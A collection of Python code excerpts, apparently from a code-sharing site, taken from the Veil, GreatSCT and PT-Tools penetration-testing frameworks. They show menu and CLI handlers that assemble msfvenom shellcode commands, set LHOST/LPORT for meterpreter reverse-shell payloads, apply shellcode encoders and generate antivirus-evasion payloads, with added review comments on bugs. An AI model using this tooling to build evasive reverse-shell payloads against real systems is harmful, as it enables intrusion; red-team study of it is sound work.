                                value = self.required_options['LPORT'][0]
                                print(' [>] Enter value for \'LPORT\': %s' % (value))
                            except:
                                # set the completer to fill in the default MSF port (4444)
                                readline.set_completer(completer.MSFPortCompleter().complete)
                                value = input(' [>] Enter value for \'LPORT\': ').strip()

                            # NOTE(review): the upper bound rejects 65535,
                            # which is a valid TCP port - confirm intended.
                            try:
                                if int(value) <= 0 or int(value) >= 65535:
                                    print(helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True))
                                    if 'LPORT' in self.required_options:
                                        self.required_options['LPORT'][0] = ""
                                    value = ""
                            except ValueError:
                                print(helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True))
                                if 'LPORT' in self.required_options:
                                    self.required_options['LPORT'][0] = ""
                                value = ""

                        else:
                            # any other option is taken as typed, with no validation
                            value = input(' [>] Enter value for \'' + option + '\': ').strip()

                    # append all the msfvenom options
                    self.msfvenom_options.append(option + "=" + value)

                # allow the user to input any extra OPTION=value pairs
                extra_msf_options = list()
                while True:
                    # clear out the tab completion
                    readline.set_completer(completer.none().complete)
                    selection = input(' [>] Enter any extra msfvenom options (syntax: OPTION1=value1 or -OPTION2=value2): ').strip()
                    if selection != '':
                        num_extra_options = selection.split(' ')
                        for xtra_opt in num_extra_options:
                            # NOTE(review): "is not ''" tests identity, not
                            # value; it is implementation-dependent and
                            # raises a SyntaxWarning on Python 3.8+. "!= ''"
                            # states the intent.
                            if xtra_opt is not '':
                                if "=" not in xtra_opt:
                                    print(helpers.color(" [!] Parameter not entered in correct syntax.\n", warning=True))
                                    continue
                                # NOTE(review): split('=')[1] keeps only the
                                # text between the first and second "=", so
                                # a value containing "=" is truncated.
                                # a name containing "-" is emitted as "NAME value", otherwise as "NAME=value"
                                if "-" in xtra_opt.split('=')[0]:
                                    final_opt = xtra_opt.split('=')[0] + " " + xtra_opt.split('=')[1]
                                    extra_msf_options.append(final_opt)
                                else:
                                    final_opt = xtra_opt.split('=')[0] + "=" + xtra_opt.split('=')[1]
                                    extra_msf_options.append(final_opt)
                    else:
                        break

                # grab any specified msfvenom options in the /etc/veil/settings.py file
                msfvenom_options = ""
                if hasattr(settings, "MSFVENOM_OPTIONS"):
                    msfvenom_options = settings.MSFVENOM_OPTIONS

                # build out the msfvenom command
                # NOTE(review): the command is assembled by plain string
                # concatenation from the prompts above and from
                # settings.MSFVENOM_OPTIONS, and it ends in a shell
                # pipeline; nothing in this method quotes the pieces. How
                # the string is executed is not visible here - if it goes
                # through a shell, each piece should be validated or quoted
                # (e.g. shlex.quote) before it is joined.
                self.msfvenomCommand = "msfvenom " + msfvenom_options + " -p " + selected_payload
                for option in self.msfvenom_options:
                    self.msfvenomCommand += " " + option
                    self.options.append(option)
                if len(extra_msf_options) != 0:
                    self.msfvenomCommand += " " + " ".join(extra_msf_options)
                self.msfvenomCommand += " -f c | tr -d \'\"\' | tr -d \'\\n\'"
                return
コード例 #9
ファイル: Tool.py プロジェクト: peterpavles/GreatSCT-1
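    def cli_menu(self, invoked=False):
        """Run one non-interactive generation from the parsed CLI options.

        ``list_payloads`` calls ``self.list_loaded_payloads()`` and does not
        end the run. After that, ``generate_awl`` calls
        ``self.generate_awl()``; otherwise, when ``p`` is set, the selected
        payload's ``required_options`` are filled from ``ip``, ``port``,
        ``msfvenom`` and ``c``, the payload's ``generate()`` is called and it
        is passed to ``outfile.compiler``.

        Invalid or missing options print an error and end the process with
        ``sys.exit()``.

        Args:
            invoked: accepted for interface compatibility; not read here
                (``outfile.compiler`` is always called with ``invoked=True``).
        """
        if self.command_options.list_payloads:
            self.list_loaded_payloads()

        if self.command_options.generate_awl:
            self.generate_awl()

        # check if a payload is provided, and if so, start the generation
        # process
        elif self.command_options.p:
            user_cli_payload = self.return_payload_object(
                self.command_options.p)
            if not user_cli_payload:
                print(
                    helpers.color(
                        "[*] Error: You did not provide a valid payload selection!",
                        warning=True))
                print(
                    helpers.color(
                        "[*] Ex: info 2 or info msbuild/shellcode_inject/virutal.py",
                        warning=True))
                sys.exit()
            if self.command_options.ip is None and (
                    "meterpreter" in user_cli_payload.path
                    or "shellcode_inject" in user_cli_payload.path):
                print(
                    helpers.color(
                        "[*] Error: You did not provide an IP/domain to connect to/bind on",
                        warning=True))
                sys.exit()

            # Make sure IP is valid
            if self.command_options.ip is not None:
                valid_ip = helpers.validate_ip(self.command_options.ip)
                valid_hostname = helpers.validate_hostname(
                    self.command_options.ip)

                if not valid_ip and not valid_hostname:
                    print(
                        helpers.color(
                            "[*] Error: You did not provide a valid ip/domain!",
                            warning=True))
                    print(
                        helpers.color("[*] Please specify the correct value",
                                      warning=True))
                    sys.exit()

            # Determine if using MSFVenom for shellcode generation
            if self.command_options.msfvenom is None and "meterpreter" not in user_cli_payload.path:
                print(
                    helpers.color(
                        "[*] Error: You did not provide a shellcode option to use!",
                        warning=True))
                sys.exit()

            # Check if using a pure payload (shellcodeless)
            if "meterpreter" in user_cli_payload.path or "shellcode_inject" in user_cli_payload.path:
                if "meterpreter" in user_cli_payload.path:
                    # Check for where the IP is being stored
                    if "LHOST" in user_cli_payload.required_options:
                        user_cli_payload.required_options["LHOST"][
                            0] = self.command_options.ip
                    elif "RHOST" in user_cli_payload.required_options:
                        user_cli_payload.required_options["RHOST"][
                            0] = self.command_options.ip
                    # Store the LPORT value in the payload
                    # NOTE(review): the port is stored as given; no range
                    # check is applied in this method.
                    if "LPORT" in user_cli_payload.required_options:
                        user_cli_payload.required_options["LPORT"][
                            0] = self.command_options.port
                else:
                    # msfvenom is always set here: the shellcode-option check
                    # above exits when it is None for a non-meterpreter path.
                    if self.command_options.msfvenom is not None:
                        cli_shellcode = shellcode_help.cli_msf_shellcode_gen(
                            self.command_options)
                    # This could be the future area for adding custom shellcode. If there
                    # is a need I can add it in

                    # Set the shellcode in the Bypass payload
                    user_cli_payload.cli_shellcode = cli_shellcode

            # Loop over setting required options
            if self.command_options.c is not None:
                for payload_option in self.command_options.c:
                    # Compare by value: an identity test against a string
                    # literal is implementation-dependent and raises a
                    # SyntaxWarning on Python 3.8+.
                    if payload_option != '':
                        if "=" not in payload_option:
                            print(
                                helpers.color(
                                    " [!] Payload option not entered in correct syntax.\n",
                                    warning=True))
                            sys.exit()
                        else:
                            # Split on the first "=" only, so a value that
                            # itself contains "=" is stored whole instead of
                            # being cut at the second "=".
                            key, _, value = payload_option.partition('=')
                            key = key.upper()
                            if key in user_cli_payload.required_options:
                                user_cli_payload.required_options[key][
                                    0] = value
                            else:
                                print(
                                    helpers.color(
                                        " [!] The option " + key +
                                        " does not exist for the selected payload!.\n",
                                        warning=True))
                                sys.exit()

            # Generate the payload code
            # source code stored in user_cli_payload.source_code
            user_cli_payload.generate()

            # figure out how to compile the code
            outfile.compiler(user_cli_payload,
                             invoked=True,
                             cli_object=self.command_options)

        return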
コード例 #10
ファイル: tool.py プロジェクト: Veil-Framework/Veil
    def cli_menu(self, invoked=False):
        """Handle a non-interactive Ordnance run from the parsed CLI options.

        Listing requests (``list_payloads`` / ``list_encoders``) print and
        end the process. Otherwise the payload named by ``ordnance_payload``
        is looked up, its LHOST/LPORT options are filled from ``ip`` and
        ``port`` after validation, ``cli_gen_shellcode()`` is called and the
        result is stored in ``self.final_shellcode``. When ``encoder`` is
        given, the matching entry of ``self.active_encoders`` re-encodes the
        payload and ``self.final_shellcode`` is refreshed.

        Validation failures print an error and call ``sys.exit()``; a
        missing ``ordnance_payload`` only prints an error and returns.

        Args:
            invoked: when true, ``payload.payload_stats()`` is not called at
                the end of the run.
        """
        opts = self.command_options

        # Listing requests are answered first and end the process.
        # --list-payloads
        if opts.list_payloads:
            self.print_payloads()
            sys.exit()
        # --list-encoders
        if opts.list_encoders:
            self.print_encoders()
            sys.exit()

        # Missing --ordnance-payload ?
        if not opts.ordnance_payload:
            print(helpers.color(" [!] ERROR: Missing ordnance-payload selection (--ordnance-payload <payload>).    Try: -t Ordnance --list-payloads", warning=True))
            return

        payload = self.return_payload_object(opts.ordnance_payload.lower())
        if not payload:
            print(helpers.color(" [!] ERROR: You specified a non-existent Ordnance payload!", warning=True))
            sys.exit()

        if "LHOST" in payload.required_options:
            # Is --ip missing?
            if opts.ip is None:
                print(helpers.color(" [!] ERROR: Missing --ip <value>", warning=True))
                sys.exit()
            ip_ok = helpers.validate_ip(opts.ip)
            hostname_ok = helpers.validate_hostname(opts.ip)
            # A hostname is accepted only for the rev_tcp_dns payload;
            # every other payload needs a valid IP address.
            if not (ip_ok or (hostname_ok and payload.cli_name == 'rev_tcp_dns')):
                print(helpers.color(" [!] ERROR: Invalid IP/Hostname specified!", warning=True))
                sys.exit()
            payload.required_options["LHOST"][0] = opts.ip

        if "LPORT" in payload.required_options:
            if not 0 < opts.port < 65535:
                print(helpers.color(" [!] ERROR: Invalid port number provided!", warning=True))
                print(helpers.color("[*] Try again?", warning=True))
                sys.exit()
            payload.required_options["LPORT"][0] = opts.port

        # Generate the original shellcode
        payload.cli_gen_shellcode()
        self.final_shellcode = payload.customized_shellcode

        # Check if an encoder is being called by the user
        if opts.encoder is not None:
            if "BadChars" in payload.required_options:
                payload.required_options["BadChars"][0] = opts.bad_chars
            matched = False
            for candidate in self.active_encoders.values():
                if opts.encoder.lower() == candidate.cli_name:
                    matched = True
                    candidate.cli_encode(payload)
            if not matched:
                print(helpers.color(" [!] ERROR: Encoder you specified was not found!", warning=True))
                print(helpers.color("[*] Try again?", warning=True))
                sys.exit()
            self.final_shellcode = payload.customized_shellcode

        # Statistics are printed only when this tool was run directly.
        if not invoked:
            payload.payload_stats()
        return
コード例 #11
ファイル: Tool.py プロジェクト: cybersecurityworks/PT-Tools
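    def use_payload(self, selected_payload):
        """Interactive prompt for configuring one selected payload.

        Installs tab completion for ``self.payload_option_commands``, shows
        the payload's options and then reads commands in a loop:

        * ``back`` / ``main`` - leave the prompt
        * ``generate`` - call ``selected_payload.generate()`` and
          ``outfile.compiler``; leave the prompt when the compiler returns a
          true value
        * ``exit`` - end the process with ``sys.exit(0)``
        * ``help`` / ``options`` - print the options screen
        * ``set KEY VALUE`` - store VALUE in ``required_options[KEY][0]``;
          LHOST and LPORT are checked with ``helpers.validate_ip`` /
          ``helpers.validate_port`` first
        * anything else - print the list of commands

        Args:
            selected_payload: payload object exposing ``path``,
                ``required_options`` and ``generate()``.
        """
        # Tab completion, thanks Will :)
        comp = completer.PayloadCompleter(self.payload_option_commands, selected_payload)
        readline.set_completer_delims(' \t\n;')
        readline.parse_and_bind("tab: complete")
        readline.set_completer(comp.complete)

        self.display_payload_options(selected_payload)

        evasion_helpers.print_dict_message(self.payload_option_commands, show_title=False)

        while True:
            payload_options_cmd = input("\n[" + selected_payload.path + ">>] ").strip()
            command = payload_options_cmd.lower()

            if command == "back" or command == "main":
                break

            elif command == "generate":
                # Add in function to validate all commands are entered
                selected_payload.generate()
                # Stay in the prompt when the compiler reports failure.
                if outfile.compiler(selected_payload):
                    break

            elif command == "exit":
                sys.exit(0)

            elif command == "help" or command == "options":
                self.print_options_screen(selected_payload)
                evasion_helpers.print_dict_message(self.payload_option_commands, show_title=False)

            elif command.startswith("set"):
                if len(payload_options_cmd.split()) == 3:
                    set_command, key, value = payload_options_cmd.split()
                    # Make sure it is uppercase
                    key = key.upper()
                    if key in selected_payload.required_options:
                        # Compare by value. An identity test ("is") against
                        # a string literal is not guaranteed to match a
                        # string built at run time by .upper(), which let
                        # LHOST/LPORT fall through to the unvalidated branch.
                        # Validate LHOST value
                        if key == "LHOST":
                            if helpers.validate_ip(value):
                                selected_payload.required_options[key][0] = value
                            else:
                                print()
                                print(helpers.color("[*] Error: You did not provide a valid IP!", warning=True))
                                print()
                        # Validate LPORT
                        elif key == "LPORT":
                            if helpers.validate_port(value):
                                selected_payload.required_options[key][0] = value
                            else:
                                print()
                                print(helpers.color("[*] Error: You did not provide a valid port number!", warning=True))
                                print()

                        else:
                            # Set other options
                            selected_payload.required_options[key][0] = value
                    else:
                        print()
                        print(helpers.color("[*] Error: You did not provide a valid option!", warning=True))
                        print(helpers.color("[*] Ex: set LHOST 8.8.8.8", warning=True))
                        print()

                else:
                    print()
                    print(helpers.color("[*] Error: You did not provide a valid amount of arguments!", warning=True))
                    print(helpers.color("[*] Ex: set DOMAIN christest.com", warning=True))
                    print()

            else:
                # Not a real command
                evasion_helpers.print_dict_message(self.payload_option_commands)

        return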